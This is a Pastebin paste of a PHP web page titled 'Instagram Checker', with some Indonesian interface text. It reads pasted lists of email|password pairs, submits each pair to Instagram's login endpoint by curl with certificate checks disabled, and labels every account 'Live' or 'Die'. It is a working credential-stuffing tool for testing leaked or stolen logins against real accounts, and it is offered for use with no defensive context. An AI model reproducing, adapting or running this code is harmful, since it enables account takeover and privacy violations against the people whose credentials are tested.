Advertisement
Guest User

Untitled

a guest
Dec 18th, 2016
324
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.13 KB | None | 0 0
  1. <html>
  2. <head>
  3. <meta http-equiv="Content-Type"
  4.  
  5. content="text/html; charset=windows-1252">
  6.  
  7. <!-- Bootstrap Start -->
  8. <link rel="stylesheet"
  9.  
  10. href="http://themes.suggelab.com/dynamic/css/bo
  11.  
  12. otstrap.css">
  13. <link rel="stylesheet"
  14.  
  15. href="http://themes.suggelab.com/dynamic/css/m
  16.  
  17. ain.css">
  18. <script
  19.  
  20. src="https://maxcdn.bootstrapcdn.com/bootstrap/
  21.  
  22. 3.3.5/js/bootstrap.min.js"></script>
  23. <script
  24.  
  25. src="https://ajax.googleapis.com/ajax/libs/jqueryu
  26.  
  27. i/1.9.2/jquery-ui.min.js"></script>
  28.  
  29. <title>Instagram Checker </title>
  30. <style>
  31. body {
  32. padding-top: 60px;
  33. }
  34. </style>
  35. </head>
  36. <body>
  37. <div class="container">
  38. <center>MAX 100 BIAR GAK 500 INTERNAL
  39.  
  40. ERROR</CENTER>
  41. <div class="panel panel-primary panelMove toggle
  42.  
  43. panelRefresh panelClose">
  44. <!-- Start .panel -->
  45. <div class="panel-
  46.  
  47. heading">
  48. <h4 class="panel-
  49.  
  50. title">Instagram[.]com account Checker</h4>
  51. </div>
  52. <div class="panel-body">
  53. <form action="" method="POST">
  54. <textarea style="background:rgba(0,225,0,00);"
  55.  
  56. name="mailpass" id="mailpass" style="width:
  57.  
  58. 441px; height: 187px;" class="form-control"
  59.  
  60. rows="7" placeholder="Username|passW0rd"><?php
  61. if (isset($_POST['mailpass'])) {
  62. echo $_POST['mailpass'];
  63. }
  64. ?></textarea><br />
  65. <input type="text" style="width: 37px; height:
  66.  
  67. 25px;" class="form-control" rows="7"
  68.  
  69. name="delim" value="|">
  70. <button id=start value="WOOT" name="submit"
  71.  
  72. class="btn btn-success">Check</button> <button
  73.  
  74. id=stop value="WOOT" class="btn btn-
  75.  
  76. success">Stop</button><br><br>
  77. <?php
  78. if(isset($_POST['submit'])){
  79. $delim = $_POST['delim'];
  80. function search($line, $delim)
  81. {
  82. $line = str_replace(" ", "", $line);
  83. $line = explode($delim, $line);
  84. $i = 0;
  85. while ($i < count($line)) {
  86. if (strpos($line[$i], '@') && strpos($line[$i],
  87.  
  88. '.')) {
  89. $email = $line[$i];
  90. $pass = $line[$i + 1];
  91. $i = 10000;
  92. if ($pass == "") {
  93. $pass = $line[$i - 1];
  94. }
  95. }
  96. $i++;
  97. }
  98. $line = $email . "|" . $pass;
  99. $line = explode('|', $line);
  100. return $line;
  101. }
  102. $data = $_POST['mailpass'];
  103. $extract = explode("\r\n", $data);
  104. $i = 0;
  105. foreach ($extract AS $k => $line) {
  106. $i++;
  107. if (strpos($line, '=>') !== false) {
  108. $line = str_replace('=>', '|', $line);
  109. }
  110. if (strpos($line, ']') !== false) {
  111. $line = str_replace('=>', '|', $line);
  112. }
  113. if (strpos($line, '[') !== false) {
  114. $line = str_replace('=>', '|', $line);
  115. }
  116.  
  117. $info = search(trim($line), $delim);
  118. $email = trim($info[0]);
  119. $pass = $info[1];
  120.  
  121. $dir = dirname(__FILE__);
  122. $config = $dir . '/_cook/' .rand
  123.  
  124. (1,999999999999999). '.txt';
  125. if (!file_exists($config)) {
  126. $fp = @fopen($config, 'w');
  127. @fclose($fp);
  128. }
  129.  
  130. $cookie = 'cookie.txt';
  131. $ch = curl_init
  132.  
  133. ('https://www.instagram.com/accounts/login/ajax
  134.  
  135. /');
  136. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER,
  137.  
  138. false);
  139. curl_setopt($ch,CURLOPT_POST,1);
  140. curl_setopt
  141.  
  142. ($ch,CURLOPT_RETURNTRANSFER,TRUE);
  143. curl_setopt($ch,CURLOPT_POST,TRUE);
  144. curl_setopt
  145.  
  146. ($ch,CURLOPT_FOLLOWLOCATION,TRUE);
  147. curl_setopt($ch,CURLOPT_COOKIEFILE,
  148.  
  149. "$config");
  150. curl_setopt($ch,CURLOPT_COOKIEJAR,
  151.  
  152. "$config");
  153. curl_setopt
  154.  
  155. ($ch,CURLOPT_POSTFIELDS,"username=
  156.  
  157. $email&password=$pass");
  158. curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
  159. $result = curl_exec($ch);
  160. $now = "<i style=\"color:blue\">Checked on
  161.  
  162. Localhost at ".date("g:i a - F j, Y")."</i>";
  163. if(empty($result)){
  164. echo "<font color=gray><b>Kesalahan Username \/
  165.  
  166. Password</b></font> => ".$email."|".$pass." | ".
  167.  
  168. $now."<br/>";
  169. }elseif(preg_match('/salah/i',$result)){
  170. echo "<font color=red><b>Die</b></font> => ".
  171.  
  172. $email."|".$pass." | ".$now."<br/>";
  173. }Else{
  174. echo "<font color=green><b>Live</b></font> => ".
  175.  
  176. $email."|".$pass." | [ACC : Instagram] | ".
  177.  
  178. $now."<br/>"; }
  179.  
  180. }
  181. }
  182.  
  183. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement